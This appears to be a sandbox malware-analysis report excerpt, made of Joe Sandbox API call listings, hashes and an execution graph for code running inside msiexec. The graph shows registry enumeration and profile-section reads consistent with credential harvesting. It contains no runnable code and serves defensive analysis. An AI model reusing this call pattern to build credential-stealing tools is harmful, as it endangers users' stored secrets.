                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                        • strlen.MSVCRT ref: 00403006
                                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                        Similarity
                                                                                        • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                        • String ID:
                                                                                        • API String ID: 2754987064-0
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: wcscpy$CloseHandle
                                                                                        • String ID: General
                                                                                        • API String ID: 3722638380-26480598
                                                                                        APIs
                                                                                          • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                          • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                          • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                        • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                        • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                        • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                        • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                        Similarity
                                                                                        • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                        • String ID:
                                                                                        • API String ID: 764393265-0
                                                                                        APIs
                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                        • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                        • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                        Similarity
                                                                                        • API ID: Time$System$File$LocalSpecific
                                                                                        • String ID:
                                                                                        • API String ID: 979780441-0
                                                                                        APIs
                                                                                        • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                        • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                        • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                        Similarity
                                                                                        • API ID: memcpy$DialogHandleModuleParam
                                                                                        • String ID:
                                                                                        • API String ID: 1386444988-0
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: ??3@
                                                                                        • String ID:
                                                                                        • API String ID: 613200358-0
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                        • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: InvalidateMessageRectSend
                                                                                        • String ID: d=E
                                                                                        • API String ID: 909852535-3703654223
                                                                                        APIs
                                                                                        • wcschr.MSVCRT ref: 0040F79E
                                                                                        • wcschr.MSVCRT ref: 0040F7AC
                                                                                          • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                          • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: wcschr$memcpywcslen
                                                                                        • String ID: "
                                                                                        • API String ID: 1983396471-123907689
                                                                                        APIs
                                                                                          • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                        • _memicmp.MSVCRT ref: 0040C00D
                                                                                        • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: FilePointer_memicmpmemcpy
                                                                                        • String ID: URL
                                                                                        • API String ID: 2108176848-3574463123
                                                                                        APIs
                                                                                        • _snwprintf.MSVCRT ref: 0040A398
                                                                                        • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: _snwprintfmemcpy
                                                                                        • String ID: %2.2X
                                                                                        • API String ID: 2789212964-323797159
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: _snwprintf
                                                                                        • String ID: %%-%d.%ds
                                                                                        • API String ID: 3988819677-2008345750
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0040E770
                                                                                        • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: MessageSendmemset
                                                                                        • String ID: F^@
                                                                                        • API String ID: 568519121-3652327722
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: PlacementWindowmemset
                                                                                        • String ID: WinPos
                                                                                        • API String ID: 4036792311-2823255486
                                                                                        APIs
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                                                        • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: ??3@DeleteObject
                                                                                        • String ID: r!A
                                                                                        • API String ID: 1103273653-628097481
                                                                                        APIs
                                                                                          • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                        • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                        • wcscat.MSVCRT ref: 0040DCFF
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: FileModuleNamewcscatwcsrchr
                                                                                        • String ID: _lng.ini
                                                                                        • API String ID: 383090722-1948609170
                                                                                        APIs
                                                                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                        • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                        • API String ID: 2773794195-880857682
                                                                                        • Opcode ID: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                                                        • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                        • Opcode Fuzzy Hash: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                                                        • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                                        APIs
                                                                                        • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                                        • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                                        • memset.MSVCRT ref: 0042BAAE
                                                                                        • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy$memset
                                                                                        • String ID:
                                                                                        • API String ID: 438689982-0
                                                                                        • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                        • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                        • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                        • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                        APIs
                                                                                          • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ??2@$memset
                                                                                        • String ID:
                                                                                        • API String ID: 1860491036-0
                                                                                        • Opcode ID: 64ebc759205d781c7cf4e92d27d3280bf84a4b50b74f77ffe9b887a22ca43919
                                                                                        • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                        • Opcode Fuzzy Hash: 64ebc759205d781c7cf4e92d27d3280bf84a4b50b74f77ffe9b887a22ca43919
                                                                                        • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                        APIs
                                                                                        • wcslen.MSVCRT ref: 0040A8E2
                                                                                          • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                          • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                          • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                        • free.MSVCRT ref: 0040A908
                                                                                        • free.MSVCRT ref: 0040A92B
                                                                                        • memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: free$memcpy$mallocwcslen
                                                                                        • String ID:
                                                                                        • API String ID: 726966127-0
                                                                                        • Opcode ID: 9067421bb5060c399d83e8366b459fd1559f14f7a756e12873c92b79cc47865f
                                                                                        • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                        • Opcode Fuzzy Hash: 9067421bb5060c399d83e8366b459fd1559f14f7a756e12873c92b79cc47865f
                                                                                        • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                        APIs
                                                                                        • wcslen.MSVCRT ref: 0040B1DE
                                                                                        • free.MSVCRT ref: 0040B201
                                                                                          • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                          • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                          • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                        • free.MSVCRT ref: 0040B224
                                                                                        • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: free$memcpy$mallocwcslen
                                                                                        • String ID:
                                                                                        • API String ID: 726966127-0
                                                                                        • Opcode ID: a695ade3a7797f376f201de80decb40066d5f736b135f44090dc4a6cd17a09b2
                                                                                        • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                        • Opcode Fuzzy Hash: a695ade3a7797f376f201de80decb40066d5f736b135f44090dc4a6cd17a09b2
                                                                                        • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                        APIs
                                                                                        • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                                                                          • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                                                                          • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                                          • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                                        • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                                                                        • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                                                                        • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcmp$memcpy
                                                                                        • String ID:
                                                                                        • API String ID: 231171946-0
                                                                                        • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                        • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                        • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                        • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                        APIs
                                                                                        • strlen.MSVCRT ref: 0040B0D8
                                                                                        • free.MSVCRT ref: 0040B0FB
                                                                                          • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                          • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                          • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                        • free.MSVCRT ref: 0040B12C
                                                                                        • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: free$memcpy$mallocstrlen
                                                                                        • String ID:
                                                                                        • API String ID: 3669619086-0
                                                                                        • Opcode ID: ee8347e84c53985be3907e5f73125604e6f6c519928a85103321f6ac1e1b5c7d
                                                                                        • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                        • Opcode Fuzzy Hash: ee8347e84c53985be3907e5f73125604e6f6c519928a85103321f6ac1e1b5c7d
                                                                                        • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                        APIs
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ??2@
                                                                                        • String ID:
                                                                                        • API String ID: 1033339047-0
                                                                                        • Opcode ID: 77d1c7bdcd1646b3b95541b6e0b18904d55dfd8e2e8227c06648e15793e87070
                                                                                        • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                        • Opcode Fuzzy Hash: 77d1c7bdcd1646b3b95541b6e0b18904d55dfd8e2e8227c06648e15793e87070
                                                                                        • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                        • malloc.MSVCRT ref: 00417407
                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                        • free.MSVCRT ref: 00417425
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide$freemalloc
                                                                                        • String ID:
                                                                                        • API String ID: 2605342592-0
                                                                                        • Opcode ID: 6a58532d87bfe5be5798e7c18fd69f9a5c0a4facd7f09204bf7deacabde6e419
                                                                                        • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                        • Opcode Fuzzy Hash: 6a58532d87bfe5be5798e7c18fd69f9a5c0a4facd7f09204bf7deacabde6e419
                                                                                        • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: wcslen$wcscat$wcscpy
                                                                                        • String ID:
                                                                                        • API String ID: 1961120804-0
                                                                                        • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                        • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                        • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                        • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                                                        Execution Graph

                                                                                        Execution Coverage:2.1%
                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                        Signature Coverage:0.5%
                                                                                        Total number of Nodes:761
                                                                                        Total number of Limit Nodes:20
410d0e 2 API calls 33576->33577 33578 410dca 33577->33578 33579 410dfd memset 33578->33579 33609 4070ae 33578->33609 33582 410e1d 33579->33582 33584 410e7f _mbscpy 33582->33584 33612 410d3d _mbscpy 33582->33612 33583 401e9e strlen strlen 33583->33457 33583->33458 33584->33583 33586 410e5b 33613 410add RegQueryValueExA 33586->33613 33588 410e73 33588->33584 33589->33461 33590->33467 33592 401c4c 33591->33592 33593 401ca1 33592->33593 33614 410add RegQueryValueExA 33592->33614 33593->33470 33593->33471 33595 401c6a 33595->33593 33596 401c71 strchr 33595->33596 33596->33593 33597 401c85 strchr 33596->33597 33597->33593 33598 401c94 33597->33598 33615 406f06 strlen 33598->33615 33600->33458 33601->33464 33602->33477 33604 410b34 33603->33604 33606 410b4c 33604->33606 33618 410add RegQueryValueExA 33604->33618 33606->33477 33607->33477 33608->33476 33610 4070bd GetVersionExA 33609->33610 33611 4070ce 33609->33611 33610->33611 33611->33579 33611->33583 33612->33586 33613->33588 33614->33595 33616 406f17 33615->33616 33617 406f1a memcpy 33615->33617 33616->33617 33617->33593 33618->33606 33620 409b40 33619->33620 33622 409b4e 33619->33622 33627 409901 memset SendMessageA 33620->33627 33623 409b99 33622->33623 33624 409b8b 33622->33624 33623->33498 33628 409868 SendMessageA 33624->33628 33626->33494 33627->33622 33628->33623 33629->33501 33631 4107f1 FreeLibrary 33630->33631 33632 403c30 LoadLibraryA 33631->33632 33633 403c74 33632->33633 33634 403c44 GetProcAddress 33632->33634 33636 4107f1 FreeLibrary 33633->33636 33634->33633 33635 403c5e 33634->33635 33635->33633 33639 403c6b 33635->33639 33637 403c7b 33636->33637 33638 404734 3 API calls 33637->33638 33640 403c86 33638->33640 33639->33637 33711 4036e5 33640->33711 33643 4036e5 23 API calls 33644 403c9a 33643->33644 33645 4036e5 23 API calls 33644->33645 33646 403ca4 33645->33646 33647 4036e5 23 API calls 33646->33647 33648 403cae 33647->33648 33721 4085d2 33648->33721 33654 403cd2 33656 403cf7 33654->33656 33873 
402bd1 37 API calls 33654->33873 33657 403d1c 33656->33657 33874 402bd1 37 API calls 33656->33874 33756 402c5d 33657->33756 33661 4070ae GetVersionExA 33662 403d31 33661->33662 33664 403d61 33662->33664 33875 402b22 42 API calls 33662->33875 33666 403d97 33664->33666 33876 402b22 42 API calls 33664->33876 33667 403dcd 33666->33667 33877 402b22 42 API calls 33666->33877 33768 410808 33667->33768 33671 404785 FreeLibrary 33672 403de8 33671->33672 33772 402fdb 33672->33772 33675 402fdb 29 API calls 33676 403e00 33675->33676 33784 4032b7 33676->33784 33685 403e3b 33687 403e73 33685->33687 33688 403e46 _mbscpy 33685->33688 33831 40fb00 33687->33831 33879 40f334 333 API calls 33688->33879 33697 404785 FreeLibrary 33696->33697 33698 40473b LoadLibraryA 33697->33698 33699 40474c GetProcAddress 33698->33699 33700 40476e 33698->33700 33699->33700 33701 404764 33699->33701 33702 404781 33700->33702 33703 404785 FreeLibrary 33700->33703 33701->33700 33702->33503 33703->33702 33705 4047a3 33704->33705 33706 404799 FreeLibrary 33704->33706 33705->33503 33706->33705 33708 410807 33707->33708 33709 4107fc FreeLibrary 33707->33709 33708->33503 33709->33708 33710->33504 33712 4037c5 33711->33712 33713 4036fb 33711->33713 33712->33643 33713->33712 33714 403716 strchr 33713->33714 33714->33712 33715 403730 33714->33715 33880 4021b6 memset 33715->33880 33717 40373f _mbscpy _mbscpy strlen 33718 4037a4 _mbscpy 33717->33718 33719 403789 sprintf 33717->33719 33881 4023e5 16 API calls 33718->33881 33719->33718 33722 4085e2 33721->33722 33882 4082cd 11 API calls 33722->33882 33724 4085ec 33725 403cba 33724->33725 33726 40860b memset 33724->33726 33733 40821d 33725->33733 33884 410b62 RegEnumKeyExA 33726->33884 33728 408637 33728->33725 33729 40865c memset 33728->33729 33886 40848b 10 API calls 33728->33886 33887 410b62 RegEnumKeyExA 33728->33887 33885 410add RegQueryValueExA 33729->33885 33734 40823f 33733->33734 33735 403cc6 33734->33735 33736 408246 memset 33734->33736 33741 4086e0 
33735->33741 33888 410b62 RegEnumKeyExA 33736->33888 33738 40826f 33738->33735 33889 4080ed 11 API calls 33738->33889 33890 410b62 RegEnumKeyExA 33738->33890 33891 4045db 33741->33891 33743 4088ef 33899 404656 33743->33899 33747 408737 wcslen 33747->33743 33753 40876a 33747->33753 33748 40877a wcsncmp 33748->33753 33750 404734 3 API calls 33750->33753 33751 404785 FreeLibrary 33751->33753 33752 408812 memset 33752->33753 33754 40883c memcpy wcschr 33752->33754 33753->33743 33753->33748 33753->33750 33753->33751 33753->33752 33753->33754 33755 4088c3 LocalFree 33753->33755 33902 40466b _mbscpy 33753->33902 33754->33753 33755->33753 33757 402c7a 33756->33757 33758 402c87 memset 33757->33758 33767 402d9a 33757->33767 33903 410b62 RegEnumKeyExA 33758->33903 33760 402cb2 33761 410b1e RegQueryValueExA 33760->33761 33763 402d3a sprintf 33760->33763 33760->33767 33904 402bd1 37 API calls 33760->33904 33905 402bd1 37 API calls 33760->33905 33906 410b62 RegEnumKeyExA 33760->33906 33762 402ce4 memset sprintf 33761->33762 33762->33760 33763->33760 33767->33661 33771 410816 33768->33771 33769 4107f1 FreeLibrary 33770 403ddd 33769->33770 33770->33671 33771->33769 33773 402ff9 33772->33773 33774 403006 memset 33773->33774 33776 403122 33773->33776 33907 410b62 RegEnumKeyExA 33774->33907 33776->33675 33777 410b1e RegQueryValueExA 33778 403058 memset sprintf 33777->33778 33782 403033 33778->33782 33779 4030a2 memset 33908 410b62 RegEnumKeyExA 33779->33908 33782->33776 33782->33777 33782->33779 33783 410b62 RegEnumKeyExA 33782->33783 33909 402db3 24 API calls 33782->33909 33783->33782 33785 4032d5 33784->33785 33786 4033a9 33784->33786 33910 4021b6 memset 33785->33910 33799 4034e4 memset memset 33786->33799 33788 4032e1 33911 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33788->33911 33790 4032ea 33791 4032f8 memset GetPrivateProfileSectionA 33790->33791 33912 4023e5 16 API calls 33790->33912 33791->33786 33796 40332f 33791->33796 33793 40339b strlen 33793->33786 
33793->33796 33795 403350 strchr 33795->33796 33796->33786 33796->33793 33913 4021b6 memset 33796->33913 33914 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33796->33914 33915 4023e5 16 API calls 33796->33915 33800 410b1e RegQueryValueExA 33799->33800 33801 40353f 33800->33801 33802 40357f 33801->33802 33803 403546 _mbscpy 33801->33803 33807 403985 33802->33807 33916 406d55 strlen _mbscat 33803->33916 33805 403565 _mbscat 33917 4033f0 19 API calls 33805->33917 33918 40466b _mbscpy 33807->33918 33811 4039aa 33813 4039ff 33811->33813 33919 40f6e2 33811->33919 33935 40f460 12 API calls 33811->33935 33936 4038e8 21 API calls 33811->33936 33814 404785 FreeLibrary 33813->33814 33815 403a0b 33814->33815 33816 4037ca memset memset 33815->33816 33938 444551 memset 33816->33938 33819 4038e2 33819->33685 33878 40f334 333 API calls 33819->33878 33821 40382e 33822 406f06 2 API calls 33821->33822 33823 403843 33822->33823 33824 406f06 2 API calls 33823->33824 33825 403855 strchr 33824->33825 33826 403884 _mbscpy 33825->33826 33827 403897 strlen 33825->33827 33828 4038bf _mbscpy 33826->33828 33827->33828 33829 4038a4 sprintf 33827->33829 33947 4023e5 16 API calls 33828->33947 33829->33828 33833 40fb10 33831->33833 33832 403e7f 33841 40f96c 33832->33841 33833->33832 33834 40fb55 RegQueryValueExA 33833->33834 33834->33832 33835 40fb84 33834->33835 33836 404734 3 API calls 33835->33836 33837 40fb91 33836->33837 33837->33832 33838 40fc19 LocalFree 33837->33838 33839 40fbdd memcpy memcpy 33837->33839 33838->33832 33951 40f802 7 API calls 33839->33951 33842 4070ae GetVersionExA 33841->33842 33843 40f98d 33842->33843 33844 4045db 7 API calls 33843->33844 33852 40f9a9 33844->33852 33845 404656 FreeLibrary 33846 403e85 33845->33846 33853 4442ea memset 33846->33853 33847 40fae6 33847->33845 33848 40fa13 memset WideCharToMultiByte 33849 40fa43 _strnicmp 33848->33849 33848->33852 33850 40fa5b WideCharToMultiByte 33849->33850 33849->33852 33851 40fa88 WideCharToMultiByte 
